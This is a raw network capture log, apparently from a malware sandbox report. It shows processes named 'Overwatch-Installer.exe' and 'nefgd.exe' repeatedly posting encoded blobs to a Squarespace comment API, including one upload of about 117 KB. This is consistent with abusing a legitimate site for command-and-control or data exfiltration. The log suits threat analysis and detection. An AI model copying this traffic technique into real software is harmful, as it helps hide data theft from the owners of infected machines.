2024-09-01 20:05:01 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:01 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	49863	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:01 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:05:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:01 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 50 7a 75 5a 6d 5a 38 74 41 44 2f 31 6b 30 38 53 39 37 76 35 78 71 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2PzuZmZ8tAD/1k08S97v5xqif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:05:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUxldUd1hEusYzdhNWFhMGQwNWY3N2UxNmE0MGU2NTliM2I3ZmNl; Path=/; Secure Set-Cookie: crumb=BQrLbtSQpQ7kNmJkYjU3OTUyNGFmYTExNmI5YzQyNGFjOTM0YjBi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: S5aHRuPa/27gssNfP Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQrLbtSQpQ7kNmJkYjU3OTUyNGFmYTExNmI5YzQyNGFjOTM0YjBi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	49861	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:01 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:01 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:01 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:01 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:01 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:01 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BY6sY6q1uTcWNzg1NjA2MDNlMGVmN2Y0M2RjODM4NjY0YjdkODli; Path=/; Secure Set-Cookie: crumb=BRPil2ylxXc7NzAyZDc1ZmZmOThiMzRmOThmMzFlYTM1MmQxNjUw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 5t8IPjGi/MIrkpR3P Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRPil2ylxXc7NzAyZDc1ZmZmOThiMzRmOThmMzFlYTM1MmQxNjUw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.5	49866	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:02 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:02 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:02 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:02 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfdbGX472chzZDIwY2FhMzBmMmNhZjM0ODdhZTE5ZWVlYTA1ZTBi; Path=/; Secure Set-Cookie: crumb=BfnAkpnJEnYkYWUyMDFhZDU4OTZiZmY0ZWU0MGFiMTVmMTY3ODU5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Qk7KWKOU/dDuO0RsY Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfnAkpnJEnYkYWUyMDFhZDU4OTZiZmY0ZWU0MGFiMTVmMTY3ODU5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
142	192.168.2.5	49867	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:02 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:02 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:02 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:02 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BajuEtjonNzXNjE3NTQyMGUwNGQxMjI3N2RkMGVhYWFkYTA3YWZh; Path=/; Secure Set-Cookie: crumb=BUPRQ87xL-9wZDk2OTAxYzZjOTc1NWViZDY0MzVkNGZmZWM1MTBh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: qAbGvG0X/hUolzPnz Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUPRQ87xL-9wZDk2OTAxYzZjOTc1NWViZDY0MzVkNGZmZWM1MTBh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
143	192.168.2.5	49868	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:02 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:05:02 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:02 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:02 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 42 70 38 35 43 71 6e 43 75 4f 35 63 73 43 7a 4f 2f 49 43 38 6a 4b 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2Bp85CqnCuO5csCzO/IC8jKif6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:05:02 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:02 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bcg7nwCyzyStMGNjZTczNTFmYzZkYmFlZTIzMDA4Njg1NDY3Yzc4; Path=/; Secure Set-Cookie: crumb=BUkmZGUs0eQsZDkwZWVjMzc0YTNmMTg3NjQ2ZGFmNTgxNzAyNjU3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Mtmhmr3Q/lCR0Rjxf Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUkmZGUs0eQsZDkwZWVjMzc0YTNmMTg3NjQ2ZGFmNTgxNzAyNjU3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
144	192.168.2.5	49870	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:02 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:03 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:03 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bbs1gWNXwF1dNTdiMWU3NGY5NThjZGJmMzI5YTdkYjJiOTUzYjk2; Path=/; Secure Set-Cookie: crumb=BZU8zNGgBlaeYjE0YjQwNGJlMGI2YjA3N2RkN2U3NzRiYTY2OWQ0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Rfj2Ww5P/cIenBUJZ Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BZU8zNGgBlaeYjE0YjQwNGJlMGI2YjA3N2RkN2U3NzRiYTY2OWQ0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
145	192.168.2.5	49869	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:03 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:05:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:03 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:05:03 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:05:03 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BeCaSxVgK9SgOTU4NGZhOGYwMWVjZWEzZTQyNzNhZWNjMjkyNDhm; Path=/; Secure Set-Cookie: crumb=BaHlZzY4I0CbODM3NzI5M2U4NDgzMjI1YzkwN2MxNmVmZTcyZTRk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: kShM7OIG/OPNU3S7c Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BaHlZzY4I0CbODM3NzI5M2U4NDgzMjI1YzkwN2MxNmVmZTcyZTRk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
146	192.168.2.5	49872	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:05:03 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116736 Expect: 100-continue
2024-09-01 20:05:03 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:05:03 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 50 31 41 72 76 65 77 65 45 4e 39 70 5a 4b 30 5a 30 55 64 75 47 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9P1ArveweEN9pZK0Z0UduGwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 79 Data Ascii: y
2024-09-01 20:05:03 UTC	16306	OUT	Data Raw: 76 2f 51 2f 50 48 38 43 65 75 76 69 59 43 53 68 43 39 32 63 54 49 4c 25 32 42 33 62 44 6a 35 79 6b 77 61 4d 4e 75 2f 41 47 44 65 61 59 46 59 70 64 73 58 53 33 55 32 51 30 63 61 56 4a 71 34 56 7a 70 72 64 39 32 78 61 65 62 25 32 42 41 68 64 56 73 58 6e 71 34 64 2f 44 36 34 25 32 42 7a 38 77 46 72 64 30 61 59 63 74 61 5a 51 52 38 30 43 47 54 34 55 35 6d 44 69 36 58 39 35 38 41 68 66 33 61 49 35 62 76 75 6f 6a 35 61 31 63 71 62 50 45 25 32 42 52 4f 54 34 64 64 6d 6e 6b 49 46 6e 55 36 78 6e 48 73 6b 4d 35 69 72 64 75 38 70 4f 69 49 41 6f 31 46 38 43 66 45 68 74 44 43 78 32 69 53 73 75 73 32 6c 49 43 34 61 7a 56 4b 4e 49 47 50 33 64 43 34 37 6d 6f 4a 36 68 61 72 71 36 41 33 73 6b 57 70 43 43 55 6e 4e 4c 47 46 35 61 42 31 7a 58 74 6c 48 70 48 55 74 69 34 42 64 Data Ascii: v/Q/PH8CeuviYCShC92cTIL%2B3bDj5ykwaMNu/AGDeaYFYpdsXS3U2Q0caVJq4Vzprd92xaeb%2BAhdVsXnq4d/D64%2Bz8wFrd0aYctaZQR80CGT4U5mDi6X958Ahf3aI5bvuoj5a1cqbPE%2BROT4ddmnkIFnU6xnHskM5irdu8pOiIAo1F8CfEhtDCx2iSsus2lIC4azVKNIGP3dC47moJ6harq6A3skWpCCUnNLGF5aB1zXtlHpHUti4Bd
2024-09-01 20:05:03 UTC	1	OUT	Data Raw: 43 Data Ascii: C
